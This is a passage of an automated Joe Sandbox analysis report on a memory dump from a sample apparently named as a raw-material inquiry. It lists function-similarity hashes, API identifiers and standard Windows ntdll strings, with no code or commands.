                                                                        • Opcode ID: 11cab82d088ca81280025574e80e28ddd722e3d351cf7ac3f7265cbec28dc641
                                                                        • Instruction ID: 0fae5b724c5031e566f5af3ab5510086ffd2bfcac84c506b731d31ec23886bd0
                                                                        • Opcode Fuzzy Hash: 11cab82d088ca81280025574e80e28ddd722e3d351cf7ac3f7265cbec28dc641
                                                                        • Instruction Fuzzy Hash: C990023128140803D280715885157471006CBD1701F95D022A0025554D8B168AA566B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 802e9c4264a524fc0be1df2235ea7b3e81e688bfc791ef04e192644945796d7b
                                                                        • Instruction ID: 5e05e4886cac92a3ae34a68bf5ccefa3d6e4b72cb958b8b0bb61c2757b3af24c
                                                                        • Opcode Fuzzy Hash: 802e9c4264a524fc0be1df2235ea7b3e81e688bfc791ef04e192644945796d7b
                                                                        • Instruction Fuzzy Hash: 8090023124184443D28072584905B4F51058BE2302FD5D02AA4157554CCE1589955721
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c59f9d194f1fb6f7fcfa643aec35ece95e1ded9b9257a0a48094fd75a2e22aec
                                                                        • Instruction ID: 7c4d6b448d8710e07aaaac40484cbd2994d8161990809cc7adff52951deb6c4f
                                                                        • Opcode Fuzzy Hash: c59f9d194f1fb6f7fcfa643aec35ece95e1ded9b9257a0a48094fd75a2e22aec
                                                                        • Instruction Fuzzy Hash: 9090023128545103D290715C45056565005ABE1301F95D032A0815594D8A5589956221
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: bda4b69eff920a2fbb92ecc9b614c9a5744ef9b5eac528f42eb166326337490f
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: 7323bb619159fb5fa2ecef6c66a4db9d75c702a358e65b873f81d39cf73e96c6
                                                                        • Instruction ID: adef328f2791aec25f303efd932246e8b0ca1134379727885bbb4edf37515852
                                                                        • Opcode Fuzzy Hash: 7323bb619159fb5fa2ecef6c66a4db9d75c702a358e65b873f81d39cf73e96c6
                                                                        • Instruction Fuzzy Hash: A75129B5A00116BFCB15DF9888849BEFBF8BB48304B54D22DF595E7681D274DE80C7A0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: 76ae5d930cac2076f9f2feecfcb686c8c1badfca8c28efece774670692c0125a
                                                                        • Instruction ID: ce079c0000c8173e4ca09b0528891b4a3f876a4293118dd135a992e7d1d33c75
                                                                        • Opcode Fuzzy Hash: 76ae5d930cac2076f9f2feecfcb686c8c1badfca8c28efece774670692c0125a
                                                                        • Instruction Fuzzy Hash: D1512875A00645AECB30DF5CC8908BFB7F9EB44304B00D45DF6AAE3681E6B4EE409760
                                                                        Strings
                                                                        • ExecuteOptions, xrefs: 00E346A0
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00E346FC
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00E34742
                                                                        • Execute=1, xrefs: 00E34713
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00E34655
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00E34787
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00E34725
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        • Opcode ID: 787a998f09df1080ad725d2b5de20ddee57b0c6d4950eb436c82f5e257817996
                                                                        • Instruction ID: 1c2631047a1592989583d27781066994f8dc57b3e9f04e87bb5a55ffa280e83a
                                                                        • Opcode Fuzzy Hash: 787a998f09df1080ad725d2b5de20ddee57b0c6d4950eb436c82f5e257817996
                                                                        • Instruction Fuzzy Hash: 3551E47160421D6ADF10ABA4EC8AFFA77A8EF09704F1940A9E605F71D1E770AE45CB70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                        • Instruction ID: b76f7669f70bcb9f17f339804364f5a26cb941255bcd531d6fcaff246c8f30b6
                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                        • Instruction Fuzzy Hash: 73023771508341AFC709DF18C890A6FBBE5EFC8704F14992EF989AB265DB31E945CB42
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                        • Instruction ID: fc3d7fd227ab418d6a7da4b21d5de0af7d10030c7a4cdc45e9532aa2676b76dc
                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                        • Instruction Fuzzy Hash: CB81C270E052499EDF288E68C8517FEBBB5BF95314F18A65AE861B72D1C7358CC0CB60
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        • Opcode ID: 6ea5514dd153049833dcbebe8f31569771cc5ba1372441b8c4ab0b1785d1907f
                                                                        • Instruction ID: 222f6d1d8b2607c582fbcfceb3c6fcf5b377b97f95e98878005d7aa483ebaf7e
                                                                        • Opcode Fuzzy Hash: 6ea5514dd153049833dcbebe8f31569771cc5ba1372441b8c4ab0b1785d1907f
                                                                        • Instruction Fuzzy Hash: 492181B6A01159ABDB10DF79CC40AEEB7F8EF58744F44511AEA49F3241EB309A458BA0
                                                                        Strings
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00E302E7
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00E302BD
                                                                        • RTL: Re-Waiting, xrefs: 00E3031E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: 622787e7c63d9fab4ff61013611f0aba1ef004d599fd522e7f315d115c19b4c4
                                                                        • Instruction ID: 98c6e4a917c473eb66a256fd9abad8bf7e288871965dcf3dc99d21618a23b997
                                                                        • Opcode Fuzzy Hash: 622787e7c63d9fab4ff61013611f0aba1ef004d599fd522e7f315d115c19b4c4
                                                                        • Instruction Fuzzy Hash: DDE1EF706047819FD725EF29C899B2ABBE0FF84314F240A2DF5A59B2E1D774D844CB62
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E3728C
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 00E372A3
                                                                        • RTL: Re-Waiting, xrefs: 00E372C1
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00E37294
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: 577ead37304fcb27599e043ef110f003a38b85293d8a887a10ce4446790a6da3
                                                                        • Instruction ID: b005afe8a88f7ad59f2702ad74160c92aa5cadb6f723e2a021d09faae3fe8e91
                                                                        • Opcode Fuzzy Hash: 577ead37304fcb27599e043ef110f003a38b85293d8a887a10ce4446790a6da3
                                                                        • Instruction Fuzzy Hash: 1D41F0B1704206ABC720DF24CC42F66BBE5FB84724F145629FD95BB291DB21E846CBE1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        • Opcode ID: f1da2d69636f19f63997ed74cef645aeea56d965a4b000aa023f69fafa028c6b
                                                                        • Instruction ID: e53548b87621cac29e1b34e6fc8078ffe17f659ec16dc00e3e201c9d718f19e5
                                                                        • Opcode Fuzzy Hash: f1da2d69636f19f63997ed74cef645aeea56d965a4b000aa023f69fafa028c6b
                                                                        • Instruction Fuzzy Hash: 04318472A0021AAFCB20DF29CC41BEEB7F8EB54714F445559E94DF3240EB34AA449BA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        • Opcode ID: 9c9274cb639a6148378741e8482272120870339aa51aceeedb7ac4080abce28f
                                                                        • Instruction ID: 3054064d526880b53565fee8c87b05a1d0f55c357c8c97c23818eda6a792bfe0
                                                                        • Opcode Fuzzy Hash: 9c9274cb639a6148378741e8482272120870339aa51aceeedb7ac4080abce28f
                                                                        • Instruction Fuzzy Hash: 3F811C72D002799BDB35DB54DC55BEEB7B4AB08714F0441EAAA19B7280D7709E84CFA0